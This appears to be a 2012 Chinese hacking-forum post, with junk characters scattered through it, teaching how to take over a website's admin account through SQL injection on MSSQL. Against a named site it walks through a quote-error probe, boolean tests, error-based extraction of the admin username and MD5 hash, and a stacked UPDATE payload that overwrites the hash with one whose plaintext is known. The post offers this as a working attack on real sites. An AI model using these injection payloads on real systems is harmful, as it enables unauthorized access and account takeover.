经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。2 V9 x$ }8 j- ~- u$ ^( ^4 p, Q
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)3 B/ d+ n2 s- a' E+ ~
测试如下:
) G+ U4 m7 t0 p) h D% Thttp://www.tmdsb.com/news.asp?id=121
9 D6 `. B. g* z k$ ]% W5 a在地址后输入单引号,显示9 r- D4 e! ^* X# l* ?% ?
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
2 Q% _: L/ h% ]( H' N3 m4 \% z字符串 ’’’ 之前有未闭合的引号
; J4 H" F" T" V/ x/news/tmdws.asp,行63* F( ?) {/ @3 g. v" g
说明没有过滤单引号且数据库是MSSQL.
2 |7 ?: g R8 g9 [1 Zand 1=1正常。and 1=2出错。肯定存在注入4 r' W$ \8 X2 R) }- I4 S7 S
接着输入
9 ?" U, k' R6 X: p: X4 ~. a: whttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
& }2 n: V8 A, w- H3 Y# h5 t4 p7 o得到帐号为:admin
# u4 q/ d i/ n/ R5 h6 Hhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
& y3 |' m2 q- k6 D. b9 k% g9 ~" }得到密码为:a4716077c2ba075c2 e$ P7 ^& L) N
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
* S8 `, A6 ~4 a$ A# \2 X' s! w命令如下 :
( J/ K0 ~, |) ]- D;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–9 U) E+ ]) x! J, N" W2 m
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41